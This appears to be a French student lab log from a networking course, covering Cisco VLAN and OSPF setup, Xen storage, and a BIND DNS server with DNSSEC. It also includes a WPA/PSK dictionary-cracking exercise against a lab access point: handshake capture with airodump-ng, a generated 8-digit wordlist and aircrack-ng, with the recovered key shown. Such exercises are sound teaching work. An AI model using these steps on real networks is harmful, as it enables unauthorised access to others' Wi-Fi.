&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
Un bon moyen de contrôler le déploiement de nos clefs : [http://dnsviz.net/]&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
